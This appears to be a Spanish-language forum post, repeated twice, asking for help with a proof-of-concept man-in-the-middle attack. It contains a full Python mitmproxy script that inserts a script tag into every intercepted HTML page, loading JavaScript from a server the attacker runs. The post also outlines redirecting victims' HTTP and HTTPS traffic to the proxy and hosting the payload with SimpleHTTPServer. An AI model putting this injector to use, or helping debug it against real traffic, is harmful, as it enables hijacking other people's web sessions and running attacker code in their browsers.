Buenas,
estoy tratando de hacer una POC que me he encontrado, y no soy capaz de inyectar el código que quiero a ver si me podéis echar un cable.
Estoy usando
KALI 2
--------
mitmproxy
y un script que me he encontrado por ahí para inyectar código JS.
# Usage: mitmdump -s "js_injector.py src"
# (this script works best with --anticache)
from bs4 import BeautifulSoup
from libmproxy.protocol.http import decoded
# On start of proxy server ask for src as an argument
def start(context, argv):
if len(argv) != 2:
raise ValueError('Usage: -s "js_injector.py src"')
context.src_url = argv[1]
def response(context, flow):
if flow.request.host in context.src_url:
return # Make sure JS isn't injected to itself
with decoded(flow.response): # Remove content encoding (gzip, ...)
html = BeautifulSoup(flow.response.content)
if html.body:
script = html.new_tag(
"script",
src=context.src_url,
type='application/javascript')
html.body.insert(0, script)
flow.response.content = str(html)
context.log("Script injected.")
Hago la redirección de tráfico HTTP y HTTPS al 8080 de mitmproxy; y el problema viene cuando trato de hacer la inyección llamando al script de java que subo a mi
python -m SimpleHTTPServer 80
alguna idea de este error?
estoy tratando de hacer una POC que me he encontrado, y no soy capaz de inyectar el código que quiero a ver si me podéis echar un cable.
Estoy usando
KALI 2
--------
mitmproxy
y un script que me he encontrado por ahí para inyectar código JS.
# Usage: mitmdump -s "js_injector.py src"
# (this script works best with --anticache)
from bs4 import BeautifulSoup
from libmproxy.protocol.http import decoded
# On start of proxy server ask for src as an argument
def start(context, argv):
if len(argv) != 2:
raise ValueError('Usage: -s "js_injector.py src"')
context.src_url = argv[1]
def response(context, flow):
if flow.request.host in context.src_url:
return # Make sure JS isn't injected to itself
with decoded(flow.response): # Remove content encoding (gzip, ...)
html = BeautifulSoup(flow.response.content)
if html.body:
script = html.new_tag(
"script",
src=context.src_url,
type='application/javascript')
html.body.insert(0, script)
flow.response.content = str(html)
context.log("Script injected.")
Hago la redirección de tráfico HTTP y HTTPS al 8080 de mitmproxy; y el problema viene cuando trato de hacer la inyección llamando al script de java que subo a mi
python -m SimpleHTTPServer 80
alguna idea de este error?